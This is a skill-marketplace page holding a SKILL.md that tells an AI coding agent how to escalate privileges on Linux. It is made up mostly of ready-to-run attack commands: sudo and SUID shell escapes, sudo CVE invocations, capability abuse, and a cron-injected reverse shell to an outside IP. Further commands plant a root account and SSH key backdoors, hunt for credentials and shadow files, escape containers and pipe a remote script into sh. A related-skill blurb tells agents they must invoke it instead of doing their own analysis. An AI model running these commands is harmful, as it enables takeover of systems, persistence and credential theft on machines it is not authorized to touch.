0X6C7879/linux-privilege-escalation
skills/linux-privilege-escalation/SKILL.md
Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.
$ install --global
skillsauthnpx skillsauth add 0X6C7879/aegissec linux-privilege-escalationInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 22, 2026, 5:54 AM131.7s1 file scanned
SKILL.md
- name:
- linux-privilege-escalation
- description:
- Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.
Linux Privilege Escalation Skill
You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
- Escalating privileges on Linux systems
- Identifying misconfigurations and vulnerabilities
- Exploiting SUID/SGID binaries
- Abusing Linux capabilities
- Kernel exploitation
- Container escape techniques
- Sudo misconfigurations and bypasses
- Cron job exploitation
- Path hijacking attacks
Core Methodologies
1. Initial System Enumeration
System Information:
# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release
# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r
# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h
Current User Context:
# Who am I?
id
whoami
groups
sudo -l
# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'
# Check PATH for hijacking opportunities
echo $PATH
Users and Groups:
# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1
# Users with bash
cat /etc/passwd | grep "/bin/bash"
# User details
cat /etc/shadow # If readable
cat /etc/group
# Home directories
ls -la /home/
2. Sudo Exploitation
Check Sudo Permissions:
# What can I run as root?
sudo -l
# Check sudo version for known vulns
sudo -V
sudo --version
Common Sudo Misconfigurations:
# NOPASSWD entries
sudo -l | grep NOPASSWD
# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files
# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive # then !bash
Sudo CVEs:
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers
GTFOBins for Sudo:
# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
3. SUID/SGID Binaries
Find SUID/SGID Files:
# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null
Exploiting SUID Binaries:
# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'
# /usr/bin/nmap (old versions)
nmap --interactive
!sh
# /usr/bin/less
less /etc/profile
!/bin/bash
# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'
# /usr/bin/perl
perl -e 'exec "/bin/bash";'
# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"
# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary
4. Linux Capabilities
What Are Capabilities: Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.
Enumerate Capabilities:
# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3.8
# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$
# Decode capability value
capsh --decode=0000003fffffffff
Exploitable Capabilities:
# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'
# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.
# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")
# cap_sys_module - load kernel modules
# Can load malicious kernel module for root
# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing
5. Cron Jobs Exploitation
Enumerate Cron Jobs:
# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/
# User crontabs
crontab -l
crontab -l -u username
# Check for running cron
ps aux | grep cron
systemctl status cron
Exploiting Writable Cron Scripts:
# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p
# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh
PATH Exploitation in Cron:
# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh
Wildcards in Cron:
# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh
6. Writable Files and Directories
Find Writable Files:
# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null
# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null
Critical Writable Files:
# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line
# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab
# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
7. Kernel Exploits
Identify Kernel Version:
uname -a
cat /proc/version
uname -r
Search for Exploits:
# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"
# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"
# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl
Common Kernel Exploits:
# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files
# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit
Kernel Exploit Resources:
- https://github.com/lucyoa/kernel-exploits
- https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/bwbwbwbw/linux-exploit-binaries
8. Container Escape
Detect if in Container:
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup
# Check for container-specific files
ls -la /.containerenv # Podman
cat /proc/1/environ | grep container
Container Escape Techniques:
# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions
# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host
# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods
9. Password Hunting
Search for Passwords:
# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null
# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
# Check environment
env | grep -i pass
# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null
# Memory dumps
strings /dev/mem
strings /proc/kcore
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
10. NFS Exploits
Check NFS Shares:
# On target
cat /etc/exports
showmount -e localhost
# From attacker machine
showmount -e 10.10.10.10
# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)
Exploit no_root_squash:
# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cp /bin/bash .
chmod +s bash
# On target
cd /home
./bash -p # root shell
Automated Enumeration Tools
LinPEAS (Recommended):
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Linux Smart Enumeration (LSE):
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1 # Level 1 (fast)
./lse.sh -l2 # Level 2 (thorough)
pspy (Monitor Processes):
# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64
Troubleshooting
Exploit Not Working:
- Check architecture:
uname -m(x86_64, i686, arm, etc.) - Compile on target system if possible
- Check kernel version exactly matches exploit requirements
- Verify exploit is for correct Linux distribution
- Check for security mitigations (AppArmor, SELinux, ASLR)
SUID Binary Not Spawning Root Shell:
- Use
-pflag to preserve privileges:/bin/bash -p - Some shells drop privileges; try different shells
- Check if binary has capabilities instead of SUID
Cannot Compile Exploit:
- Transfer pre-compiled binary
- Cross-compile on attacker machine
- Use statically compiled binaries
- Check for gcc, g++, make on target
Permission Denied Errors:
- Check file permissions carefully
- Verify you're in correct group
- Check AppArmor/SELinux is not blocking
- Try different attack vector
Reference Links
- HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
When to Use This Skill
Activate this skill when the user asks to:
- Escalate privileges on a Linux system
- Enumerate Linux privilege escalation vectors
- Exploit SUID binaries or capabilities
- Abuse sudo misconfigurations
- Escape from containers
- Identify kernel exploits
- Find and exploit cron job weaknesses
- Analyze Linux security misconfigurations
Always ensure proper authorization before performing privilege escalation on any system.
Related Skills
0X6C7879/wooyun-legacy
development
VerifiedTrustedCommunity
WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/windows-privilege-escalation
tools
VerifiedTrustedCommunity
Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/tunnel
development
VerifiedTrustedCommunity
Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/threat-modeling
development
VerifiedTrustedCommunity
Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.
2SKILL.mdUpdated Apr 22, 2026